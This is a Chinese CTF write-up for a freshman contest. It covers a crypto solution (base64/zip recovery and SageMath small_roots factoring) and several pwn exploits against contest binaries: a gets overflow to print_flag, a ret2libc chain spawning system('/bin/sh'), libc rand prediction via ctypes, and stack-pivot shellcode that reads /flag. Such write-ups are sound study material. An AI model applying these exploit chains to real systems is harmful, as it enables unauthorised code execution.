目录
Crypto
Absolute_Baby_Encrytpion
单表替换,略
babylua
四位大小写爆破,略
Magic of Encoding
这不是misc题吗???
base64解密看见一大堆fake flag;
看见PK压缩包格式了,多半要想一想怎么弄成压缩包。
我直接把fake的base64密文全删了,然后就给了一个压缩包出来了
# -*- coding utf-8 -*-
# @Time : 2023/4/16 12:17
f=open('Magic_Of_Encoding.txt','rb').read()
import base64
ff=open('1.zip','wb')
print(f.replace(b'ZmxhZ3tYZF9mYWtlX2ZsYWdfeER9',b'').replace(b'ZmluZF9tZV9pZl95b3VfY2Fu',b'').replace(b'ZmxhZ3tub3RfdGhlX2NvcnJlY3Rf',b'').replace(b'ZmxhZ19sb2x9',b'').replace(b'CmZsYWd7bm90X3RoZV9jb3JyZWN0X2ZsYWdfbG9sfQpmbGFne25vdF90aGVfY29ycmVjdF9mbGFnX2xvbH0K',b''))
res=b'UEsDBBQACAAIAAZUilYAAAAAAAAAACUAAAAVACAATWFnaWMgb2YgRW5jb2RpbmcudHh0VVQNAAdNkTNkTpEzZE2RM2R1eAsAAQT1AQAABBQAAABLy0lMr84wKDCOrzQojc/JzDZOiS/JSI33NUnPTI43L8pMzq7lAgBQSwcIjmX6WicAAAAlAAAAUEsBAhQDFAAIAAgABlSKVo5l+lonAAAAJQAAABUAIAAAAAAAAAAAAKSBAAAAAE1hZ2ljIG9mIEVuY29kaW5nLnR4dFVUDQAHTZEzZE6RM2RNkTNkdXgLAAEE9QEAAAQUAAAAUEsFBgAAAAABAAEAYwAAAIoAAAAAAA=='
ff.write(base64.b64decode(res))
ff.close()
然后打开1.zip压缩包得到flag
Math Problem
给出域为p的椭圆曲线,和其上一点的纵坐标。x是64小bits数。考虑在多项式环n求解x
使用(small_roots)方法
平时这种都是比较大的数求解,我这个太久没注意到epsilon这个参数了
SageMath中small_roots
方法的epsilon
参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据1/2 * N^(beta^2 // delta - epsilon)
我们可以直接调整epsilon
的值为0.01
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间
from tqdm import *
# x,y=G.xy()
# x,y=ZZ(x),ZZ(y)
# -x**3-a*x-b+y^2,(-x**3-a*x-b+y^2) %n,p,x
e = 65537
n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877
c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008
a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619
b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913
y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854
PR.<x> = PolynomialRing(Zmod(n))
for i in tqdm(range(2148,4096)):
f=(x+(i<<52))^3+a*(x+(i<<52))+b-y^2
f=f.monic()
if f.small_roots(X=2^52,beta=0.44):
print(i)
print(f.small_roots(X=2^52,beta=0.44))
break
p=gcd(ZZ(f(2661801545956375)),n)
q=n//p
d=inverse(e,(p-1)*(q-1))
long_to_bytes(ZZ(pow(c,d,n)))
打新生赛成小丑了
Pwn
EASY PWN
开启PIE
fd = open("/dev/urandom", 0);
if ( fd < 0 )
{
puts("Can't access /dev/urandom.");
exit(1);
}
v3 = read(fd, buf, 0xAuLL);
if ( v3 < 0 )
{
puts("Data not received from /dev/urandom");
exit(1);
}
close(fd);
puts("Password:");
gets(s1);
result = strcmp(s1, buf);
if ( result )
result = puts("I swore that was the right password ...");
else
v5 = 1;
if ( v5 )
{
puts("Guess I couldn't gaslight you!");
result = print_flag();
}
return result;
}
gets溢出到返回地址,然后覆盖后2字节为print_flag函数地址
exp
from pwn import *
p=process('./easypwn')
p=remote('node6.anna.nssctf.cn',28850)
elf=ELF('./easypwn')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
p.recvuntil(b':\n')
payload=b'a'*0x1f+p64(0)+p16(0x11d5)
p.send(payload)
p.interactive()
Shellcode
没啥说的,短点的shellcode就行
我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的
from pwn import *
from LibcSearcher import *
p=process('./p1')
#p=remote('node5.anna.nssctf.cn',28961)
context.arch='amd64'
#context.log_level='debug'
lea=0x000000000040074e
rdi=0x00000000004007b3
ret=0x000000000040028e
elf=ELF('./p1')
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
context(log_level = 'debug', arch = 'amd64', os = 'linux')
p.recv()
p.send(b'1')
p.recvuntil(b"Let's start!\n")
p.sendline(b'a'*10+p64(0)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main']))
puts_addr=get_addr()
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
log.success(hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
log.success(hex(system))
log.success(hex(bin_sh))
#gdb.attach(p)
p.recv()
p.send(b'a')
p.recvuntil(b"Let's start!\n")
p.sendline(b'a'*10+p64(0)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system))
p.interactive()
真男人下120层
这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用
from pwn import *
from ctypes import *
p=process('./bin')
p=remote('node6.anna.nssctf.cn',28283)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
v4=libc.rand()% 3 - 1522127470
libc.srand(v4)
for i in range(120):
t=libc.rand() %4+1
p.sendline(str(t).encode())
p.interactive()
Random
远程没通
随机数预测+栈迁移到shellcode
感觉跟 [极客大挑战 2019]Not Bad 一样。
from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'
elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')
jmp = 0x000000000040094e
bss = 0x601200
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, bss, 0x50)
orw_payload += shellcraft.write(1, bss,0x50)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
p.recvuntil(b':\n')
p.sendline(str(libc.rand()% 50).encode())
p.recvuntil(b'door\n')
RANDOM()
payload=asm(shellcraft.read(0,bss,0x100))+asm('mov rax,0x601200;call rax')
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp)+asm('sub rsp,0x30;jmp rsp')
shellcode=asm(orw_payload)
p.sendline(shellcode)
p.interactive()
看见别人直接把bss用rsp来替代,都不用在call一下就行。又学到一点
from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'
elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')
bss=0x600100
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, 'rsp', 0x50)
orw_payload += shellcraft.write(1, 'rsp',0x50)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
p.recvuntil(b':\n')
p.sendline(str(libc.rand()% 50).encode())
p.recvuntil(b'door\n')
RANDOM()
jmp_rsp=0x000000000040094e
payload=asm(shellcraft.read(0,'rsp',0x50))
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
p.send(payload)
shellcode=asm(orw_payload)
p.sendline(b'a'*0xc+shellcode)
p.interactive()